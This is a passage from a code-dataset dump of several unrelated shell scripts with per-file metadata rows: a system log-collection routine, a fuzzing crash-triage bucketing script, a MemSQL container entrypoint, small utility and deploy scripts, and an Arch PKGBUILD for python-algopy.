    echo    "${hostname}: Host Info .........: ${LOGFILE}"
    # CGCS build info
    delimiter ${LOGFILE} "${BUILD_INFO_CMD}"
    ${BUILD_INFO_CMD} >> ${LOGFILE}
    delimiter ${LOGFILE} "uptime"
    uptime >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "cat /proc/cmdline"
    cat /proc/cmdline >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "cat /proc/version"
    cat /proc/version >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "lscpu"
    lscpu >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "lscpu -e"
    lscpu -e >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "cat /proc/cpuinfo"
    cat /proc/cpuinfo >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "cat /sys/devices/system/cpu/isolated"
    cat /sys/devices/system/cpu/isolated >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "ip addr show"
    ip addr show >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "lspci -nn"
    lspci -nn >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "find /sys/kernel/iommu_groups/ -type l"
    find /sys/kernel/iommu_groups/ -type l >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # networking totals
    delimiter ${LOGFILE} "cat /proc/net/dev"
    cat /proc/net/dev >> ${LOGFILE}
    delimiter ${LOGFILE} "dmidecode"
    dmidecode >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # summary of scheduler tunable settings
    delimiter ${LOGFILE} "cat /proc/sched_debug | head -15"
    cat /proc/sched_debug | head -15 >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # When masking is enabled, drop facter's ssh host key facts.
    if [ "${SKIP_MASK}" = "true" ]; then
        delimiter ${LOGFILE} "facter (excluding ssh info)"
        facter | grep -iv '^ssh' >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    else
        delimiter ${LOGFILE} "facter"
        facter >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    fi
    if [[ "$nodetype" == "worker" || "$subfunction" == *"worker"* ]] ; then
        delimiter ${LOGFILE} "topology"
        topology >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    fi
    LOGFILE="${EXTRA_DIR}/memory.info"
    echo    "${hostname}: Memory Info .......: ${LOGFILE}"
    delimiter ${LOGFILE} "cat /proc/meminfo"
    cat /proc/meminfo >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "cat /sys/devices/system/node/node?/meminfo"
    cat /sys/devices/system/node/node?/meminfo >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "cat /proc/slabinfo"
    log_slabinfo ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "ps -e -o ppid,pid,nlwp,rss:10,vsz:10,cmd --sort=-rss"
    ps -e -o ppid,pid,nlwp,rss:10,vsz:10,cmd --sort=-rss >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # list open files
    delimiter ${LOGFILE} "lsof -lwX"
    lsof -lwX >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # hugepages numa mapping
    delimiter ${LOGFILE} "grep huge /proc/*/numa_maps"
    grep -e " huge " /proc/*/numa_maps >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # rootfs and tmpfs usage
    delimiter ${LOGFILE} "df -h -H -T --local -t rootfs -t tmpfs"
    df -h -H -T --local -t rootfs -t tmpfs >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    LOGFILE="${EXTRA_DIR}/filesystem.info"
    echo    "${hostname}: Filesystem Info ...: ${LOGFILE}"
    # disk inodes usage
    delimiter ${LOGFILE} "df -h -H -T --local -t rootfs -t tmpfs"
    df -h -H -T --local -t rootfs -t tmpfs >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # disk space usage
    delimiter ${LOGFILE} "df -h -H -T --local -t ext2 -t ext3 -t ext4 -t xfs --total"
    df -h -H -T --local -t ext2 -t ext3 -t ext4 -t xfs --total >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # disk inodes usage
    delimiter ${LOGFILE} "df -h -H -T --local -i -t ext2 -t ext3 -t ext4 -t xfs --total"
    df -h -H -T --local -i -t ext2 -t ext3 -t ext4 -t xfs --total >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # disks by-path values
    delimiter ${LOGFILE} "ls -lR /dev/disk"
    ls -lR /dev/disk >> ${LOGFILE}
    # disk summary (requires sudo/root)
    delimiter ${LOGFILE} "fdisk -l"
    fdisk -l >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "cat /proc/scsi/scsi"
    cat /proc/scsi/scsi >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # Controller specific stuff
    if [ "$nodetype" = "controller" ] ; then
        delimiter ${LOGFILE} "cat /proc/drbd"
        cat /proc/drbd >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
        delimiter ${LOGFILE} "/sbin/drbdadm dump"
        /sbin/drbdadm dump >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    fi
    # LVM summary
    delimiter ${LOGFILE} "/usr/sbin/vgs --version ; /usr/sbin/pvs --version ; /usr/sbin/lvs --version"
    /usr/sbin/vgs --version >> ${LOGFILE}
    /usr/sbin/pvs --version >> ${LOGFILE}
    /usr/sbin/lvs --version >> ${LOGFILE}
    delimiter ${LOGFILE} "/usr/sbin/vgs --all --options all"
    /usr/sbin/vgs --all --options all >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "/usr/sbin/pvs --all --options all"
    /usr/sbin/pvs --all --options all >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "/usr/sbin/lvs --all --options all"
    /usr/sbin/lvs --all --options all >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # iSCSI Information
    LOGFILE="${EXTRA_DIR}/iscsi.info"
    echo    "${hostname}: iSCSI Information ......: ${LOGFILE}"
    if [ "$nodetype" = "controller" ] ; then
        # Controller- LIO exported initiators summary
        delimiter ${LOGFILE} "targetcli ls"
        targetcli ls >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
        # Controller - LIO sessions
        delimiter ${LOGFILE} "targetcli sessions detail"
        targetcli sessions detail >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    elif [[ "$nodetype" == "worker" || "$subfunction" == *"worker"* ]] ; then
        # Worker - iSCSI initiator information
        collect_dir=${EXTRA_DIR}/iscsi_initiator_info
        mkdir -p ${collect_dir}
        cp -rf /run/iscsi-cache/nodes/* ${collect_dir}
        find ${collect_dir} -type d -exec chmod 750 {} \;
        # Worker - iSCSI initiator active sessions
        delimiter ${LOGFILE} "iscsiadm -m session"
        iscsiadm -m session >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
        # Worker - iSCSI udev created nodes
        delimiter ${LOGFILE} "ls -la /dev/disk/by-path | grep \"iqn\""
        ls -la /dev/disk/by-path | grep "iqn" >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    fi
    LOGFILE="${EXTRA_DIR}/history.info"
    echo    "${hostname}: Bash History ......: ${LOGFILE}"
    # history
    delimiter ${LOGFILE} "cat /home/sysadmin/.bash_history"
    cat /home/sysadmin/.bash_history >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    LOGFILE="${EXTRA_DIR}/interrupt.info"
    echo    "${hostname}: Interrupt Info ....: ${LOGFILE}"
    # interrupts
    delimiter ${LOGFILE} "cat /proc/interrupts"
    cat /proc/interrupts >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    delimiter ${LOGFILE} "cat /proc/softirqs"
    cat /proc/softirqs >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # Controller specific stuff
    if [ "$nodetype" = "controller" ] ; then
        netstat -pan > ${EXTRA_DIR}/netstat.info
    fi
    LOGFILE="${EXTRA_DIR}/blockdev.info"
    echo    "${hostname}: Block Devices Info : ${LOGFILE}"
    # Collect block devices - show all sda and cinder devices, and size
    delimiter ${LOGFILE} "lsblk"
    lsblk >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # Collect block device topology - show devices and which io-scheduler
    delimiter ${LOGFILE} "lsblk --topology"
    lsblk --topology >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
    # Collect SCSI devices - show devices and cinder attaches, etc
    delimiter ${LOGFILE} "lsblk --scsi"
    lsblk --scsi >> ${LOGFILE} 2>>${COLLECT_ERROR_LOG}
}
# --- main collection flow: run the collectors, gather /var/log, tar it all --
log_space "before collect ......:"
collect_extra
collect_parts
#
# handle collect collect-after and collect-range and then
# in elif clause collect-before
#
VAR_LOG="/var/log"
if [ -e /www/var/log ]; then
    VAR_LOG="$VAR_LOG /www/var/log"
fi
rm -f ${VAR_LOG_INCLUDE_LIST}
# Build the list of /var/log files to include, optionally filtered by the
# requested date range via the collect_date helper.
if [ "${STARTDATE_RANGE}" == true ] ; then
    if [ "${ENDDATE_RANGE}" == false ] ; then
        ilog "collecting $VAR_LOG files containing logs after ${STARTDATE}"
        ${COLLECT_DATE} ${STARTDATE} ${ENDDATE} ${VAR_LOG_INCLUDE_LIST} ${DEBUG} ""
    else
        ilog "collecting $VAR_LOG files containing logs between ${STARTDATE} and ${ENDDATE}"
        ${COLLECT_DATE} ${STARTDATE} ${ENDDATE} ${VAR_LOG_INCLUDE_LIST} ${DEBUG} ""
    fi
elif [ "${ENDDATE_RANGE}" == true ] ; then
    STARTDATE="20130101"
    ilog "collecting $VAR_LOG files containing logs before ${ENDDATE}"
    ${COLLECT_DATE} ${STARTDATE} ${ENDDATE} ${VAR_LOG_INCLUDE_LIST} ${DEBUG} ""
else
    ilog "collecting all of $VAR_LOG"
    find $VAR_LOG ! -empty > ${VAR_LOG_INCLUDE_LIST}
fi
# Add VM console.log
for i in /var/lib/nova/instances/*/console.log; do
    if [ -e "$i" ]; then
        tmp=`dirname $i`
        mkdir -p ${COLLECT_NAME_DIR}/$tmp
        cp $i ${COLLECT_NAME_DIR}/$tmp
    fi
done
# Stage everything into COLLECT_NAME_DIR: tar the include list plus the
# static include paths, then immediately untar into the staging dir.
log_space "before first tar ....:"
(cd ${COLLECT_NAME_DIR} ; ${IONICE_CMD} ${NICE_CMD} ${TAR_CMD} ${COLLECT_NAME_DIR}/${COLLECT_NAME}.tar -T ${VAR_LOG_INCLUDE_LIST} -X ${RUN_EXCLUDE} -X ${ETC_EXCLUDE} -X ${VAR_LOG_EXCLUDE} ${COLLECT_INCLUDE} 2>>${COLLECT_ERROR_LOG} 1>>${COLLECT_ERROR_LOG} )
log_space "after first tar .....:"
(cd ${COLLECT_NAME_DIR} ; ${IONICE_CMD} ${NICE_CMD} ${UNTAR_CMD} ${COLLECT_NAME_DIR}/${COLLECT_NAME}.tar 2>>${COLLECT_ERROR_LOG} 1>>${COLLECT_ERROR_LOG} )
log_space "after first untar ...:"
rm -f ${COLLECT_NAME_DIR}/${COLLECT_NAME}.tar
log_space "after delete tar ....:"
if [ "${SKIP_MASK}" != "true" ]; then
    # Run password masking before final tar
    dlog "running /usr/local/sbin/collect_mask_passwords ${COLLECT_NAME_DIR} ${EXTRA_DIR}"
    /usr/local/sbin/collect_mask_passwords ${COLLECT_NAME_DIR} ${EXTRA_DIR}
    log_space "after passwd masking :"
fi
(cd ${COLLECT_BASE_DIR} ; ${IONICE_CMD} ${NICE_CMD} ${TAR_ZIP_CMD} ${COLLECT_NAME_DIR}.tgz ${COLLECT_NAME} 2>/dev/null 1>/dev/null )
log_space "after first tarball .:"
# Add the SM flight recorder data, then re-create the final tarball with it.
mkdir -p ${COLLECT_NAME_DIR}/${FLIGHT_RECORDER_PATH}
(cd /${FLIGHT_RECORDER_PATH} ; ${TAR_ZIP_CMD} ${COLLECT_NAME_DIR}/${FLIGHT_RECORDER_PATH}/${FLIGHT_RECORDER_FILE}.tgz ./${FLIGHT_RECORDER_FILE} 2>>${COLLECT_ERROR_LOG} 1>>${COLLECT_ERROR_LOG})
# Pull in an updated user.log which contains the most recent collect logs
# ... be sure to exclude any out of space logs
tail -30 /var/log/user.log | grep "COLLECT:" | grep -v "${FAIL_OUT_OF_SPACE_STR}" >> ${COLLECT_ERROR_LOG}
cp -a ${COLLECT_LOG} ${COLLECT_LOG}.last
cp -a ${COLLECT_ERROR_LOG} ${COLLECT_LOG}
cp -a ${COLLECT_LOG} ${COLLECT_NAME_DIR}/var/log
log_space "with flight data ....:"
(cd ${COLLECT_BASE_DIR} ; ${IONICE_CMD} ${NICE_CMD} ${TAR_ZIP_CMD} ${COLLECT_NAME_DIR}.tgz ${COLLECT_NAME} 2>>${COLLECT_ERROR_LOG} 1>>${COLLECT_ERROR_LOG} )
log_space "after collect .......:"
rm -rf ${COLLECT_NAME_DIR}
rm -f ${VAR_LOG_INCLUDE_LIST}
log_space "after cleanup .......:"
# Check for collect errors
# Only out of space error is enough to fail this hosts's collect
collect_errors ${HOSTNAME}
RC=${?}
rm -f ${COLLECT_ERROR_LOG}
if [ ${RC} -ne 0 ] ; then
    rm -f ${COLLECT_NAME_DIR}.tgz
    ilog "${FAIL_OUT_OF_SPACE_STR} ${COLLECT_BASE_DIR}"
else
    ilog "collect of ${COLLECT_NAME_DIR}.tgz succeeded"
    echo "${collect_done}"
fi
| true |
adf7b7f6256372654bcdf394d02e76d2bf857734 | Shell | Thiefyface/-_- | /buckets.sh | UTF-8 | 3,351 | 3.71875 | 4 | [] | no_license | #!/bin/bash -x
# Crash-triage setup.  Require at least the fuzz target on the command line;
# testing $# avoids the unquoted-$1 breakage when the path contains spaces.
if [ $# -eq 0 ]; then
    echo "[x.x] Usage:"
    echo "$0 <fuzz_binary> <fuzz_binary_options>"
    exit
fi

# Triage layout: per-crash logs and proof-of-concept inputs, bucketed by
# crash class.  mkdir -p is idempotent, so no need to discard errors.
mkdir -p crash_logs/asan_dir crash_logs/segv_dir crash_logs/other_dir crash_logs/dups
mkdir -p pocs/asan_dir pocs/segv_dir pocs/other_dir pocs/dups

# Keep ASan from failing the run on leaks or huge allocation requests.
export ASAN_OPTIONS=detect_leaks=0,allocator_may_return_null=1
# for the afl crashes (./id:* entries whose name mentions "crashes"):
# glob instead of parsing `ls` output so names survive word-splitting.
for i in ./id*; do
    case "$i" in
        *crashes*) ;;
        *) continue ;;
    esac
    log="crash_logs/$(basename "$i").txt"
    if [ -f "$log" ]; then
        # already triaged on a previous run
        continue
    fi
    echo "New Entry: $i"
    # Run the target ("$@" = binary plus its options, kept as separate
    # words) on the crashing input, capturing stdout+stderr per crash.
    #gdb -ex run -ex quit --args "$@" "$i" 2>&1 | tee "$log"
    "$@" "$i" 2>&1 | tee "$log"
    echo "*****************************"
done
# libFuzzer-style ./crash-* inputs; skip any .bak copies.
for i in ./crash-*; do
    case "$i" in
        *.bak) continue ;;
    esac
    echo "$i"
    log="crash_logs/$(basename "$i").txt"
    if [ -f "$log" ]; then
        # already triaged on a previous run
        continue
    fi
    echo "New Entry: $i"
    #gdb -ex "set confirm off" -ex run -ex quit --args "$@" "$i" 2>&1 | tee "$log"
    "$@" "$i" 2>&1 | tee "$log"
    echo "*****************************"
done
# --- bucket the per-crash logs by signature -----------------------------
cd crash_logs
touch asan_buckets.txt
touch sigsegv_buckets.txt
touch other_buckets.txt
logcount=$(find . -name "crash-*.txt" | wc -l)
echo "[^_^] Processing $logcount logs"
sigseg=0
asan=0
other=0
dups=0
# sort these first
# grep -L lists files that match NEITHER pattern, i.e. crashes that are
# neither SEGV nor ASan reports -> "other" bucket.
for i in `grep -L -e "SEGV" -e "ERROR: AddressSanitizer" crash-*.txt`; do
    crash=$(basename `echo "$i"` | cut -d "." -f 1)
    echo $crash >> other_buckets.txt
    other=$(( other + 1 ))
    mv $i other_dir
    mv ../$crash ../pocs/other_dir
done
# Newline-only IFS so the `ls` word-splitting below keeps one file per word.
export IFS=$'\n'
for i in `ls ./crash-*.txt`; do
    # grep return 1 on fail...
    summary="$(grep "ERROR: AddressSanitizer" $i | cut -d " " -f 2- | sort -u)"
    if [ $? -eq 0 ]; then
        # New ASan signature? (grep status 1 == not already bucketed)
        grep "$summary" asan_buckets.txt
        if [ $? -eq 1 ]; then
            crash=$(basename `echo "$i"` | cut -d "." -f 1)
            echo $crash >> asan_buckets.txt
            echo $summary >> asan_buckets.txt
            echo "--------------------------------" >> asan_buckets.txt
            asan=$(( asan + 1 ))
            mv $i asan_dir
            mv ../$crash ../pocs/asan_dir
            continue
        fi
    fi
    # SIGSEGV signature: crash line plus 5 lines of context, joined with '|'.
    summary="$(grep -r "SIGSEGV" -A 5 $i | cut -d "." -f 2- | grep -v -- '--' | tr '\n' '|' )"
    if [ $? -eq 0 ]; then
        grep "$summary" sigsegv_buckets.txt
        if [ $? -eq 1 ]; then
            crash=$(basename `echo "$i"` | cut -d "." -f 1)
            echo $crash >> sigsegv_buckets.txt
            echo $summary >> sigsegv_buckets.txt
            echo "--------------------------------" >> sigsegv_buckets.txt
            sigseg=$(( sigseg + 1 ))
            mv $i segv_dir
            mv ../$crash ../pocs/segv_dir
            continue
        fi
    fi
    # anything left in this dir is a dup or a new crash...
    mv $i dups
    dups=$(( dups + 1 ))
    crash=$(basename `echo "$i"` | cut -d "." -f 1)
    mv ../$crash ../pocs/dups
done
echo "[>_>]*****Stats*******[<_<]"
echo "[S_S] Sigsegv: $sigseg"
echo "[A_A] Asan   : $asan"
echo "[O.o] Other  : $other"
echo "[d.d] dups   : $dups"
| true |
3a8abced034bc9a0950b1d4aa5b4af19de507d9b | Shell | kotobot/memsql-docker-quickstart | /memsql-entrypoint.sh | UTF-8 | 310 | 2.90625 | 3 | [] | no_license | #!/bin/bash
set -e
# Docker entrypoint convention: when the image is asked to run "memsqld",
# bring up the MemSQL cluster via memsql-ops and keep the container alive
# by tailing the trace logs (exec replaces this shell as PID 1).
if [ "$1" = "memsqld" ]; then
    # Start up the cluster
    memsql-ops start
    memsql-ops memsql-start --all
    memsql-ops memsql-list
    # Tail the logs to keep the container alive
    exec tail -F /memsql/master/tracelogs/memsql.log /memsql/leaf/tracelogs/memsql.log
fi
# Any other command line is executed verbatim (e.g. a debug shell).
exec "$@"
| true |
7a910599f6c45cb5544a48badea37adf0683d45a | Shell | fitzfitsahero/fitzfitsahero | /scripts/twitterXML.sh | UTF-8 | 248 | 2.671875 | 3 | [] | no_license | #!/bin/sh
# This script pulls down an xml feed of the supplied user as the first command line option
# The .twittercreds_ file has the format- username:password
# Quote the credential substitution and the URL so a password containing
# spaces/globs (or an odd username argument) cannot be word-split.
curl -u "$(cat .twittercreds_fitz)" "http://twitter.com/statuses/user_timeline/$1.xml"
| true |
e03e87a092f5559eb6023cfaa4f17c8cd32fcd8d | Shell | Zacharis278/music-madness | /manifests/scripts/generate-sha.sh | UTF-8 | 174 | 2.75 | 3 | [] | no_license | #!/bin/bash
set -e

# Capture the SHA of the built client content.
# NUL-delimited find|xargs handles paths with spaces; LC_ALL=C sort -z makes
# the file order (and therefore the combined digest) deterministic, since
# find's traversal order is filesystem-dependent.
SHA="$(find ./bracket -type f -print0 | LC_ALL=C sort -z | xargs -0 shasum | shasum)"

# Return as JSON
printf '{"sha": "%s"}\n' "$SHA"
5c2d975848162f62352e663b4f48e0808e1ea9d7 | Shell | loknjinu13/week4scripts | /README.md | UTF-8 | 502 | 2.9375 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash -x
#week4scripts
# Page metadata used by the HTML here-doc at the bottom of this script.
title="Week4scripts"
# locale date, 12-hour time, numeric timezone
RIGHT_NOW=$(date +"%x %r %z")
TIME_STAMP="updated on $RIGHT_NOW by $USER"
#### Functions
# Emit an HTML fragment showing filesystem usage (df output inside <pre>).
drive_space ()
{
    printf '%s\n' "<h3> Filesystem Space </h3>" "<pre>"
    df
    printf '%s\n' "</pre>"
}
# Emit an HTML fragment while allocating a 30 MiB zero-filled file
# ("cache1") in the current directory.  dd's transfer statistics go to
# stderr, so only the HTML markers land on stdout.
SWAP_File ()
{
    # was "</h2>": mismatched closing tag, fixed to match the opening <h3>
    echo "<h3>SwapFile space allocation</h3>"
    echo "<pre>"
    dd if=/dev/zero of=cache1 bs=1024k count=30
    echo "</pre>"
}
# Render the report page.  <<- strips leading tabs from the here-doc body,
# and $vars / $(...) inside it are expanded.
# NOTE(review): "$SWAP_File" expands a (never-set) *variable*, not the
# SWAP_File function - it was almost certainly meant to be "$(SWAP_File)".
# Left unchanged here because calling it would also create a 30 MB file.
cat <<- _EOF_
	<html>
	<head>
	<title>
	$title
	</title>
	</head>
	<body>
	<p>$TIME_STAMP</p>
	$SWAP_File
	$(drive_space)
	</body>
	</html>
_EOF_
| true |
020d16e764c2d4af5c2a15a40b818d304d215af2 | Shell | longlonghash/fluidex-backend | /stop.sh | UTF-8 | 964 | 3.375 | 3 | [] | no_license | #!/bin/bash
# Fail on unset vars / errors, echo commands for traceability.
set -uex
# NOTE(review): common.sh presumably defines docker_rm used below - confirm.
source ./common.sh
# Absolute directory of this script, regardless of invocation cwd.
DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" > /dev/null 2>&1 && pwd)"
EXCHANGE_DIR=$DIR/dingir-exchange
PROVER_DIR=$DIR/prover-cluster
STATE_MNGR_DIR=$DIR/rollup-state-manager
FAUCET_DIR=$DIR/regnbue-bridge
# SIGKILL every process whose ps line mentions 'fluidex-backend' (listed
# first for the trace).  || true keeps set -e happy when nothing matches.
# NOTE(review): kill -9 by grepping ps is blunt - it matches on the full
# command line, so unrelated processes with that string also die.
function kill_tasks() {
    # kill last time running tasks:
    ps aux | grep 'fluidex-backend' | grep -v grep | awk '{print $2 " " $11}'
    kill -9 $(ps aux | grep 'fluidex-backend' | grep -v grep | awk '{print $2}') || true
    # tick.ts
    # matchengine
    # rollup_state_manager
    # coordinator
    # prover
}
# Tear down one sub-project's compose stack and delete its data directory.
# Arguments: $1 - project directory, $2 - docker-compose project name
# NOTE(review): docker_rm is not defined in this file - presumably a
# root-capable rm helper from common.sh; verify its argument order.
function stop_docker_compose() {
    dir=$1
    name=$2
    docker-compose --file $dir/docker/docker-compose.yaml --project-name $name down
    docker_rm $dir/docker/data -rf
}
# Tear down every sub-project's compose stack, in the same order as before.
function stop_docker_composes() {
    local dirs=("$EXCHANGE_DIR" "$PROVER_DIR" "$STATE_MNGR_DIR" "$FAUCET_DIR")
    local names=(exchange prover rollup faucet)
    local idx
    for idx in 0 1 2 3; do
        stop_docker_compose "${dirs[$idx]}" "${names[$idx]}"
    done
}
# Kill stray backend processes first, then bring down all compose stacks.
kill_tasks
stop_docker_composes
| true |
9b5065a21eff34c5efb18bb969405b14010a6315 | Shell | hughec1329/135_project | /stripnet.sh | UTF-8 | 217 | 2.734375 | 3 | [] | no_license | #!/bin/bash
# script to strip out peeps belonging to top nets.
# awk reads the file directly (no useless cat); column 2 holds the net id.
nets=$(awk -F " " '{print $2}' ./topnets)
# top 100 nets
for t in $nets
do
    # Quote the id so an unexpected value cannot glob or word-split.
    ./getnet.sh /home/hugh/data/fb_mhrw.txt "$t"
    echo "done " "$t"
done
| true |
d6e524ec119d258d5aeeba1ed75bd1c2915e9157 | Shell | hanson007/LOL | /projectdata/apis/updata_app/templates/git_pull.sh | UTF-8 | 3,352 | 3.234375 | 3 | [] | no_license | #!/usr/bin/env bash
#####################
# version: 0.1
# name: xuebk
# time: 2017-05-30
# help: system update / redeploy program  (was: 系统更新程序)
#####################
# load system-level environment variables  (was: 加载系统层变量)
source ~/.bash_profile
# base variables  (was: 基础变量)
cd `dirname $0`
# directory this program is executed from  (was: 本程序执行目录)
BIN_DIR=$(cd "$(dirname "$0")"; pwd)
# #### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
# basics  (was: 基础)
# Ensure the script runs as the 'tomcat' user; exit 2 otherwise.
# (was: 检测当前用户是否 为tomcat 用户.)
# NOTE(review): STDOUT_FILE is never defined in this template - presumably
# exported by the caller; tee -a with an empty argument would fail.
function CheckUser(){
    # 检测当前用户是否 为tomcat 用户.
    check_user=`whoami`
    if [ "$check_user" != "tomcat" ]
    then
        echo "You are '$check_user' is not tomcat" | tee -a ${STDOUT_FILE}
        exit 2
    fi
}
# #### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
CheckUser
##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
# Deployment parameters rendered by the Jinja template engine
# ({{ ... }} / {% ... %}) before this script is executed.
Name="{{ App }}"
BIN_DIR="{{ data.BIN_DIR }}"
CODE_DIR="{{ data.CODE_DIR }}"
Bin_Start="{{ data.Bin_Start }}"
Bin_Stop="{{ data.Bin_Stop }}"
{% if data.Bin_Config %}
Bin_Config="{{ data.Bin_Config }}"
{% else %}
Bin_Config="echo ok"
{% endif %}
giturl="{{ data.giturl }}"
commitid="{{ commit_id }}"
##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
# NOTE(review): every real action below is commented out - this template
# currently only echoes the commands (dry-run); uncomment to execute.
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Stop}"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Stop}
echo "source /home/tomcat/.bash_profile && [ -d '${BIN_DIR}/${CODE_DIR}/' ] && rm -rf ${BIN_DIR}/${CODE_DIR}/*"
# source /home/tomcat/.bash_profile && [ -d '${BIN_DIR}/${CODE_DIR}/' ] && rm -rf ${BIN_DIR}/${CODE_DIR}/*
echo "source /home/tomcat/.bash_profile && [[ -d '${BIN_DIR}/.git-${Name}' ]] && mv ${BIN_DIR}/.git-${Name} ${BIN_DIR}/${CODE_DIR}/.git"
# source /home/tomcat/.bash_profile && [[ -d '${BIN_DIR}/.git-${Name}' ]] && mv ${BIN_DIR}/.git-${Name} ${BIN_DIR}/${CODE_DIR}/.git
##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
echo "source /home/tomcat/.bash_profile && mkdir -p ${BIN_DIR}/${CODE_DIR}/"
# source /home/tomcat/.bash_profile && mkdir -p ${BIN_DIR}/${CODE_DIR}/
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git checkout master 1>/dev/null"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git checkout master 1>/dev/null
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git checkout ./. 1>/dev/null"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git checkout ./. 1>/dev/null
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git pull origin master"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR}/${CODE_DIR}/ && git pull origin master
##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
echo "source /home/tomcat/.bash_profile && [[ -d '${BIN_DIR}/${CODE_DIR}/.git' ]] && mv ${BIN_DIR}/${CODE_DIR}/.git ${BIN_DIR}/.git-${Name}"
# source /home/tomcat/.bash_profile && [[ -d '${BIN_DIR}/${CODE_DIR}/.git' ]] && mv ${BIN_DIR}/${CODE_DIR}/.git ${BIN_DIR}/.git-${Name}
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Config} 1>/dev/null"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Config} 1>/dev/null
echo "source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Start}"
# source /home/tomcat/.bash_profile && cd ${BIN_DIR} && ${Bin_Start}
##### ##### ##### ##### ##### ##### ##### ##### ##### ##### ##### #####
5b7a64238b80e62fa96128be7546c8429ac38535 | Shell | delkyd/alfheim_linux-PKGBUILDS | /python-algopy/PKGBUILD | UTF-8 | 1,485 | 2.5625 | 3 | [] | no_license | # Contributor: Hector <hsearaDOTatDOTgmailDOTcom>
pkgbase=python-algopy
pkgname=('python2-algopy' 'python-algopy')
pkgver=0.5.3
pkgrel=1
pkgdesc='A tool for Algorithmic Differentiation (AD) and Taylor polynomial approximations.'
url='http://packages.python.org/algopy/'
license=("BSD")
arch=('any')
depends=()
makedepends=('python2-setuptools' 'python-setuptools')
options=('!libtool')
source=("https://pypi.python.org/packages/source/a/algopy/algopy-${pkgver}.zip")
sha1sums=('4ebb09d8cf1b11c69d02c4d6c8806462831037d4')
prepare() {
cd "$srcdir"
cp -a algopy-${pkgver} algopy-py2-${pkgver}
}
build() {
msg2 "Building algopy - Python2"
cd "${srcdir}/algopy-py2-${pkgver}"
python2 setup.py build
msg2 "Building algopy - Python3"
cd "${srcdir}/algopy-${pkgver}"
python setup.py build
}
package_python-algopy() {
depends=('python-numpydoc')
optdepends=()
msg2 "Installing algopy python3"
cd "${srcdir}/algopy-${pkgver}"
python setup.py install --root="${pkgdir}/" --optimize=1 --skip-build
# Remove left over directories from distribute utils.
find ${pkgdir} -type d -name "__pycache__" -exec rm -r {} \; -prune
}
package_python2-algopy() {
# depends=('python2-numpydoc')
optdepends=()
msg2 "Installing algopy python2"
cd "${srcdir}/algopy-py2-${pkgver}"
python2 setup.py install --root="${pkgdir}/" --optimize=1 --skip-build
# Remove left over directories from distribute utils.
find ${pkgdir} -type d -name "__pycache__" -exec rm -r {} \; -prune
}
| true |
